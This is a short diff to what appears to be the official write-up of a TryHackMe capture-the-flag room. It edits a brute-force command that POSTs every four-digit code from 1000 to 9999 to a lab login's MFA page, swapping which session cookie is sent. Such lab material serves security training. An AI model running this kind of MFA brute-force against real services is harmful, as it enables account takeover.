--- a/_posts/2021-09-25-tryhackme-biteme-official-writeup.html
+++ b/_posts/2021-09-25-tryhackme-biteme-official-writeup.html
@@ -105,7 +105,7 @@ url="http://10.x.x.x/console/mfa.php" \
 method=POST \
 body="code=RANGE0" \
 0=int:1000-9999 \
-header="Cookie: pwd=violet; hash=d1d813a48d99f0e102f7d0a1b9068001" \
+header="Cookie: user=jason_test_account; pwd=violet" \
 -x ignore:fgrep="Incorrect code"
 {% endhighlight %}
 
